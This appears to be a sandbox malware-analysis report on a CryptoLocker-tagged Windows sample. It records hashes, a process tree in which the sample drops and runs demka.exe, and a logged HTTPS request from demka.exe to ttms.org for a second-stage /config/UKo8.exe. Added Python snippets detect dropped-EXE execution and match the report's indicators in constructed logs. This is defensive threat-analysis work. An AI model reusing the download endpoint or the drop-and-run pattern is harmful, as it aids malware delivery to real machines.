
Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/04/2024, 11:26 UTC

General

  • Target

    2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe

  • Size

    41KB

  • MD5

    1c0ba3fecb4fce6c0e4ee9bc43e9fb5e

  • SHA1

    f1e17181bc011eccd9dd743f25b4e08365df65c6

  • SHA256

    2e7f3b77a9ca84c90a8e849b92a9001342725a456df28b56b8a7dc4152936a0c

  • SHA512

    9b59eff7d9802bcb5aaad66db3e3fffda809b89ccd1aa2e13f8bc450b998c71afb6a61bbaa06b847bf6b82893d69d94f7abc10319b3f162a0cb3c1ed4e7ebab7

  • SSDEEP

    768:bAvJCYOOvbRPDEgXrNekd7l94i3py/yY/Jc:bAvJCF+RQgJeab4sy/lu

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants (1 IoC)
  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store (2 TTPs, 2 IoCs)
  • Suspicious use of UnmapMainImage (2 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe (PID 2392, depth 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe"
    • Loads dropped DLL
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Local\Temp\demka.exe (PID 3052, depth 2, child of PID 2392)
      Command line: "C:\Users\Admin\AppData\Local\Temp\demka.exe"
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of UnmapMainImage
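The process tree above is what the "Executes dropped EXE" signature keys on: PID 2392 writes demka.exe into its own %TEMP% directory and then launches it as PID 3052. The following is an added example, not tria.ge's own detection code, that reproduces that logic over Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records. The records are constructed to mirror this report; the explorer.exe parent (PID 1204), the notepad.exe launch and the FileCreate event for demka.exe are assumptions for illustration, since the report only shows the two malicious processes and their PIDs.

```python
"""Flag execution of executables that were dropped earlier in the same trace.

Added example (not tria.ge code): reproduces the idea behind the report's
"Executes dropped EXE" signature over constructed Sysmon-style records.
Event ID 11 = FileCreate, Event ID 1 = ProcessCreate (Sysmon numbering).
"""
import json
from typing import Dict, Iterable, List

# Constructed JSON-lines records modelled on the process tree in this report.
# PID 1204 (explorer.exe), the notepad.exe launch and the FileCreate event for
# demka.exe are assumptions; tria.ge shows only PIDs 2392 and 3052.
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessId": 2392, "Image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe", "ParentProcessId": 1204, "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 11, "ProcessId": 2392, "Image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe", "TargetFilename": "C:\\Users\\Admin\\AppData\\Local\\Temp\\demka.exe"}
{"EventID": 1, "ProcessId": 4100, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentProcessId": 1204, "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 11, "ProcessId": 4100, "Image": "C:\\Windows\\System32\\notepad.exe", "TargetFilename": "C:\\Users\\Admin\\Documents\\notes.txt"}
{"EventID": 1, "ProcessId": 3052, "Image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\demka.exe", "ParentProcessId": 2392, "ParentImage": "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe"}
"""


def parse_events(text: str) -> List[Dict]:
    """Parse JSON-lines event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_dropped_exe_executions(events: Iterable[Dict]) -> List[Dict]:
    """Return one hit per ProcessCreate whose image was written earlier in the trace.

    Windows paths are case-insensitive, so they are compared lower-cased.
    Events must be in chronological order: a file has to be created before
    it can be executed, and the rule relies on seeing the write first.
    """
    dropped: Dict[str, int] = {}   # lower-cased path -> PID that wrote it
    hits: List[Dict] = []
    for ev in events:
        if ev["EventID"] == 11:
            target = ev["TargetFilename"].lower()
            if target.endswith(".exe"):
                dropped[target] = ev["ProcessId"]
        elif ev["EventID"] == 1:
            image = ev["Image"].lower()
            if image in dropped:
                hits.append({
                    "image": ev["Image"],
                    "pid": ev["ProcessId"],
                    "parent_pid": ev["ParentProcessId"],
                    "dropper_pid": dropped[image],
                    # True when the dropper itself launched the file, as in this report
                    "parent_is_dropper": ev["ParentProcessId"] == dropped[image],
                })
    return hits


if __name__ == "__main__":
    for hit in find_dropped_exe_executions(parse_events(SAMPLE_EVENTS)):
        print(f"PID {hit['pid']} executed dropped file {hit['image']} "
              f"(written by PID {hit['dropper_pid']}, launched by PID {hit['parent_pid']})")
```

The rule deliberately matches any process that executes a file written during the trace, not only the writer's own children; `parent_is_dropper` distinguishes the direct drop-and-run pattern seen here from a staged file launched later by something else.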

Network

  • DNS query (resolver 8.8.8.8:53, process demka.exe, geolocation US)
    Request: ttms.org IN A
    Response: ttms.org IN A 35.215.114.222
  • HTTPS request (remote 35.215.114.222:443, process demka.exe, geolocation US)
    GET https://ttms.org/config/UKo8.exe
    Request:
      GET /config/UKo8.exe HTTP/1.1
      Accept: text/*, application/*
      User-Agent: Updates downloader
      Host: ttms.org
      Cache-Control: no-cache
    Response:
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Sun, 28 Apr 2024 11:26:41 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Httpd: 1
      Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
      X-Proxy-Cache: EXPIRED
      X-Proxy-Cache-Info: 0 NC:000000 UP:

  Connections (bytes sent / bytes received, packets sent / packets received):

  • 35.215.114.222:443 (ttms.org, tls/http, demka.exe): 3.1kB / 91.0kB, 55 / 69

    HTTP Request

    GET https://ttms.org/config/UKo8.exe

    HTTP Response

    404
  • 8.8.8.8:53 (ttms.org, dns, demka.exe): 54 B / 70 B, 1 / 1

    DNS Request

    ttms.org

    DNS Response

    35.215.114.222
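The network section gives four indicators worth hunting on: the domain ttms.org, the resolved IP 35.215.114.222, the URI /config/UKo8.exe and the non-browser User-Agent "Updates downloader". The server answered 404, so the second stage was never retrieved in this run and nothing on this page says what UKo8.exe would have been. The block below is an added example, not tria.ge's code, that matches those indicators against HTTP and DNS logs. The log lines are constructed, tab-separated records in a subset of Zeek's http.log/dns.log fields in an assumed order; the client IPs, the example.com traffic and the cdn.example.net line are invented to show a miss and a UA-only hit.

```python
"""Match the network indicators from this report against HTTP and DNS logs.

Added example (not tria.ge code). The log lines are constructed,
tab-separated records in the shape of a subset of Zeek's http.log and
dns.log fields (field order assumed), not real captures.
"""
from typing import Dict, List

# Indicators taken from the Network section of this report.
IOC_DOMAIN = "ttms.org"
IOC_IP = "35.215.114.222"
IOC_URI = "/config/UKo8.exe"
IOC_USER_AGENT = "Updates downloader"   # non-browser UA sent by demka.exe

HTTP_FIELDS = ["ts", "src_ip", "dst_ip", "dst_port", "method", "host", "uri", "user_agent", "status"]
DNS_FIELDS = ["ts", "src_ip", "resolver", "query", "qtype", "answers"]

# Constructed sample logs (assumed field order above). 10.0.0.x clients,
# the example.com traffic and cdn.example.net are invented for illustration.
SAMPLE_HTTP_LOG = "\n".join([
    "1714303601.0\t10.0.0.5\t35.215.114.222\t443\tGET\tttms.org\t/config/UKo8.exe\tUpdates downloader\t404",
    "1714303602.0\t10.0.0.7\t93.184.216.34\t443\tGET\texample.com\t/index.html\tMozilla/5.0 (Windows NT 6.1; Win64; x64)\t200",
    "1714303603.0\t10.0.0.9\t203.0.113.10\t443\tGET\tcdn.example.net\t/config/a1b2.exe\tUpdates downloader\t200",
])
SAMPLE_DNS_LOG = "\n".join([
    "1714303600.0\t10.0.0.5\t8.8.8.8\tttms.org\tA\t35.215.114.222",
    "1714303601.5\t10.0.0.7\t8.8.8.8\texample.com\tA\t93.184.216.34",
])


def parse_tsv(text: str, fields: List[str]) -> List[Dict[str, str]]:
    """Turn tab-separated lines into dicts keyed by the given field names."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def match_http(rec: Dict[str, str]) -> List[str]:
    """Return the reasons one HTTP record matches this report's indicators."""
    reasons = []
    if rec["dst_ip"] == IOC_IP:
        reasons.append("dst_ip")
    if rec["host"].lower() == IOC_DOMAIN:
        reasons.append("host")
    if rec["uri"] == IOC_URI:
        reasons.append("uri")
    # Behavioural indicator: the UA string is a property of the downloader,
    # not of the server, so it still fires if the domain or IP changes.
    if rec["user_agent"] == IOC_USER_AGENT:
        reasons.append("user_agent")
    return reasons


def match_dns(rec: Dict[str, str]) -> List[str]:
    """Return the reasons one DNS record matches this report's indicators."""
    reasons = []
    if rec["query"].lower() == IOC_DOMAIN:
        reasons.append("query")
    if IOC_IP in rec["answers"].split(","):
        reasons.append("answer")
    return reasons


def scan(http_text: str, dns_text: str) -> List[Dict]:
    """Scan both logs and return one hit per matching record."""
    hits: List[Dict] = []
    for rec in parse_tsv(http_text, HTTP_FIELDS):
        reasons = match_http(rec)
        if reasons:
            # The status code tells the analyst whether the payload was served;
            # in this report the sandbox got a 404, so UKo8.exe was never obtained.
            hits.append({"type": "http", "src_ip": rec["src_ip"], "host": rec["host"],
                         "status": rec["status"], "reasons": reasons})
    for rec in parse_tsv(dns_text, DNS_FIELDS):
        reasons = match_dns(rec)
        if reasons:
            hits.append({"type": "dns", "src_ip": rec["src_ip"], "query": rec["query"],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_HTTP_LOG, SAMPLE_DNS_LOG):
        print(hit)
```

The domain and IP are a single-run observation and may change between samples; the User-Agent and the `/config/<name>.exe` download path are the pieces that belong to the downloader itself, which is why the third sample line is still flagged on the UA alone.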

MITRE ATT&CK Enterprise v15


Downloads

  • \Users\Admin\AppData\Local\Temp\demka.exe

    Filesize

    42KB

    MD5

    95b28e317eb31757ee544a5537243611

    SHA1

    5f3a800b2923126d372e026e1b353c5cea2e0064

    SHA256

    25052e28e3d8c1e75c39029e580dd1eb07724d99f4a33a4e193cc92012e5d7c0

    SHA512

    a794915f6bfd3fc22bb5595d5b7bae909818d45e7e41adc5e456d5f9725c06adc7aa47a244ba44219c5c952ebd3aad912c9a49066bf9c8285890160480033611

  • memory/2392-0-0x00000000003E0000-0x00000000003E6000-memory.dmp

    Filesize

    24KB

  • memory/2392-1-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

  • memory/2392-8-0x00000000003E0000-0x00000000003E6000-memory.dmp

    Filesize

    24KB

  • memory/3052-23-0x0000000000380000-0x0000000000386000-memory.dmp

    Filesize

    24KB
